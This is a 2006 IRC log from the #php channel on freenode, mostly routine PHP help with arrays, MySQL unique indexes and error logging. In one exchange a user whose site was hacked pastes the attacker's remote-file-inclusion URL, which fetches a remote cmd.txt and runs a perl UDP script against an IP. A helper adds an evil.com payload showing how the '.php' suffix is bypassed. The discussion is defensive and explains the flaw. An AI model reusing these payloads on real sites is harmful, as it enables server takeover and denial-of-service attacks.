Log from #php at freenode 2006-06-14
[00:03]<[sfrac]>hi, can you tell me why this script doesn't work? http://www.nopaste.info/index.php?id=14d6079b3e .. i want if i click on ID1 switch to id ==1
[00:06]<rrppygrvnm>!tell [slack] about register_globals
[00:07]<afd>anyone know something like hibernate (or better) for php?
[00:07]<afd>(not like AR..)
[00:08]<[sfrac]>caffinated: shit... thx.. ;)
[00:08]<axracruddv7>anyone know about securing inputs in php script??? i got hacked by some kiddy script who was including stuff from another server??
[00:09]<zdzxzzmfdgzx>jhgjkguiyt6: http://phpsec.org
[00:09]<axracruddv7>richardlynch thx
[00:09]<rrppygrvnm>jhgjkguiyt6: that's less about your inputs, and more about how you're using the data submitted by the inputs.
[00:10]<rrppygrvnm>my guess is that you're doing something like: include($_GET['page']);
[00:11]<axracruddv7>caffinated no! i have nothing like this!!
[00:11]<rrppygrvnm>if he is causing your server to execute remote code, then you have something that is doing it.
[00:11]<zdzxzzmfdgzx>If you got hacked as you describe, you have to have SOMETHING like that, somewhere, somehow...
[00:11]<||aw>!tell jhgjkguiyt6 about xss
[00:12]<axracruddv7>they used this link to get in
[00:12]<axracruddv7>http://broadband.spectravoice.com/web/index.php?op=http://otravesso.100free.com/cmd.txt?&cmd=cd%20/tmp;mkdir%20.tt;cd%20.tt;perl%20udp.txt%20200.168.245.68%2027015%2027015
[00:12]<zdzxzzmfdgzx>He only typed the one-liner obvious way of describing what you said happened, not the convoluted version.
[00:12]<||aw>jhgjkguiyt6: yeah, that sounds like you have include($op); ...guessing reg globals on too :)
[00:12]<rrppygrvnm>ROFL
[00:13]<rrppygrvnm>that looks like a shell_exec actually
[00:14]<||aw>heh, Owned Group OwnzZ YouR SySteM
[00:14]<rrppygrvnm>haha, nice
[00:14]<rrppygrvnm>yeah, you're right. include
[00:14]<axracruddv7>this script suck lol
[00:14]<rrppygrvnm>no, your code is suck.
[00:15]<axracruddv7>lol iam not the one who made it :P
[00:15]<||aw>jhgjkguiyt6: just make sure that op= something that you want it to equal, like a number between 1 and 5 or a match from a set list of page names
[00:16]<||aw>just don't ever trust user input. assume they will do something wrong
[00:16]<rrppygrvnm>since he could not see what was happening, i doubt he is qualified to fix it :P
[00:16]<||aw>edjumacation
[00:16]<axracruddv7>i see it now <td valign="top"><? include ($op.".php");?></td>
[00:16]<zjfnz>how do I insert an entry into an existing array at a specific location?
[00:16]<rrppygrvnm>wow. quality.
[00:16]<zdzxzzmfdgzx>So he's getting an education in the Real World that will eventually make him qualified. Isn't that why we bother?
[00:17]<||aw>hm, that .".php" should have failed it
[00:17]<||aw>at least for this one it would fail
[00:17]<rrppygrvnm>no, because it's easy to eliminate that
[00:17]<rrppygrvnm>$op = "http://evil.com/foo.txt&hi="
[00:17]<||aw>ah, the ? in that op
[00:17]<||aw>missed that
[00:18]<czzznzz>hi
[00:19]<czzznzz>does anyone know of a good php based PhoneBook
[00:19]<zjfnz>is the only way to insert an entry into an array is go through it and add it to a temporary array and copy it back? or is there a php function for this
[00:19]<||aw>i'm sure freshmeat.net has lots of reviews on them
[00:19]<czzznzz>ah
[00:19]<czzznzz>i found Address Book
[00:20]<||aw>roler: depends on where you want to insert it
[00:20]<czzznzz>but didn't know about freshmeat.net
[00:20]<zdzxzzmfdgzx>roler: Hunh? $array[] = 'value'; or $array[4] = 'fifth'; will do...
[00:20]<czzznzz>thanks ||cw
[00:20]<zdzxzzmfdgzx>roler: Or maybe you need http://php.net/array_splice
[00:20]<zjfnz>richardlynch; well If I have a [4] already, I want [4] to go to 5
[00:20]<kzzvzrys>good night :)
[00:20]<zdzxzzmfdgzx>roler: http://php.net/array_splice is DEFINITELY what you want.
[00:21]<txnpzxc>is there a way to load a module dynamically and override a module that has been compiled in .. ?
[00:22]<||aw>ThePrhk: no
[00:22]<||aw>maybe with runkit
[00:22]<||aw>but therein lies madness
[00:22]<txnpzxc>so if gd is compiled in i would need to recompile php to update it .. ?
[00:24]<zdzxzzmfdgzx>ThePrhk: Technically, you could just re-compile the GD extension to PHP and install just the .so (or .dll) file, IF you match up all the versions of everything (Apache/PHP) in the header files and all that... Compiling your second time is about 10 X faster than your first, if you are newbie. :-)
[00:24]<zjfnz>thanks guys!
[00:25]<txnpzxc>the thing is this is on a production server that i really am not sure what all was compiled into php
[00:25]<sgjjffsd>Don't know if this is the right place to ask but... I would like to register a domain name and host it. Which hosts offer php 5 && the latest mysql for a fair price?
[00:25]<sgjjffsd>PS: I would like to register a .ru name
[00:26]<ptwzfzus>richardlynch you are a madman
[00:26]<txnpzxc>and i know there is not a backup that would be able to recover from a botched recompile
[00:27]<zdzxzzmfdgzx>ThePrhk: phpinfo will tell you exactly what configure line was used -- Though if a package was "missing" and didn't get "in" due to compile errors, it would not "match" but then you can cross-check with the list of extensions for that -- again, all in phpinfo.
[00:27]<zdzxzzmfdgzx>ThePrhk: And, of course, you should backup your existing installation before doing a re-compile, to be sure you can revert.
[00:27]<ptwzfzus>in php, can I make an assignment statement within an if structure? like: 'if ($result = mysql_fetch_array($result))' to check to see if the result had any hits?
[00:27]<||aw>yes
[00:28]<ptwzfzus>and that assigns your array to result too?
[00:28]<ptwzfzus>obviously I know but just making sure
[00:28]<zdzxzzmfdgzx>PTWalrus: Sure -- so long as it's readable code.
[00:28]<||aw>if you are only expecting 1 or 0 rows, that should work just fine
[00:28]<ptwzfzus>yeah that's the case cw... but I am all about hearing a more elegant way to do it if you guys have one and want to tell me :)
[00:29]<ptwzfzus>I try and be a stickler on good form
[00:30]<zdzxzzmfdgzx>As far as good form goes... $result is kinda generic, like $x. And we'd need way more context to say if the if(...) bit is readable or just cruft.
[00:30]<burxrggjg>is there a way to get all of the values in a column out of the database then print them on the screen? I can get an entire row, but not an entire column...
[00:31]<zdzxzzmfdgzx>Buchannon: You could iterate through all the rows and build up a column... Or do you just mean the field names? http://php.net/mysql_field_name
[00:32]<ptwzfzus>well, I want to check to see if a date has an entry in the database, and if not, create the entry with no information in it
[00:33]<cllyswnyzm>is there any way in the script to change what SMTP server the mail function uses?
[00:33]<burxrggjg>richardlynch: going through each row one by one would be quite taxing on mysql wouldn't it? Nah, not the field names but the values in a column
[00:33]<zdzxzzmfdgzx>PTWalrus: Create a UNIQUE INDEX on the date field. Do an INSERT. It will fail if it's not unique. Problem solved.
[00:34]<ptwzfzus>ahhh and that won't make any messy error messages?
[00:34]<zdzxzzmfdgzx>Buchannon: How many rows are there?...
[00:34]<ptwzfzus>I did make it unique
[00:34]<burxrggjg>richardlynch: well only 2 right now, but I'm expecting it to get bigger
[00:34]<zdzxzzmfdgzx>PTWalrus: You control the error messages... if (mysql_errno() == 1062){ //duplicate insert, ignore it. }
[00:34]<zdzxzzmfdgzx>Buchannon: Define "bigger"
[00:35]<burxrggjg>richardlynch: hard to say right now, I think I found what I was looking for though with mysql_fet_array()
[00:36]<rrppygrvnm>better than letting it error is to use an ON DUPLICATE KEY syntax to take a different action.
[00:37]<rrppygrvnm>that way, you can update any existing parts if it already exists.
[00:41]<szgdsvzjd>On error reporting in php, is it possible to output errors to some log, without showing them to the user?
[00:41]<rrppygrvnm>http://php.net/set_error_handler
[00:42]<rrppygrvnm>see also: http://php.net/error_log
[00:42]<zdzxzzmfdgzx>sandstrom: That's kinda exactly what it says in php.ini... If you can't change php.ini, nor .htaccess, use set_error_handler as noted already.
[00:42]<rrppygrvnm>the second link is probably closer to what you want
[00:54]<jzpnu>hy all
[01:05]<lwjggywe>Hey there, anybody experience with mysql_connect NOT giving errors upon connect failures?
[01:05]<lwjggywe>I have this REALLY weird thing.. I can login to mysql as any random user and mysql_connect just returns a resource







